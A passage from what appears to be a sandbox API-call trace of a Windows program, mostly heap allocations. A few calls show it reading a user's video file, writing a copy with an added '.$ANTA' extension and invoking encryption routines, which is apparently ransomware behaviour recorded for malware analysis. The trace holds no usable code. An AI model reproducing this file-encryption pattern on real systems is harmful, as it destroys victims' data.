(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5a98 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a80e8 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5a98 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a8430 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a84d8 [0105.358] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx")) returned 0x10 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a84d8 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a80e8 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0105.359] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\c98txuiy1khtvyz_ctr.avi.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0105.359] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.359] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.359] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.360] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0105.360] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.360] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0105.360] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.360] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0e020 [0105.363] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0105.363] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xd0cb, lpOverlapped=0x0) returned 1 [0105.364] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0105.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0105.364] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0105.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0105.365] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0cb) returned 0x4516010 [0105.365] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0e020 | out: hHeap=0x1780000) returned 1 [0105.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0105.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0105.367] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0105.367] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0cb) returned 0x45230e8 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.368] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0cb) returned 0x4516010 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.368] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0105.368] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.368] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0105.368] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ce8 | out: hHeap=0x1780000) returned 1 [0105.368] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b10 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0cb) returned 0x4516010 [0105.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29d0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29f0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0105.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2b20 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.369] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac88 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0cb) returned 0x45301c0 [0105.369] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0105.370] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0105.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ace80 [0105.370] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0105.370] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.370] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a20 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0105.371] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a20 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad30 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0105.371] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.371] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0105.371] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796de8 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0105.372] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.372] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bd0 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.372] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0105.373] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.373] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0105.373] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 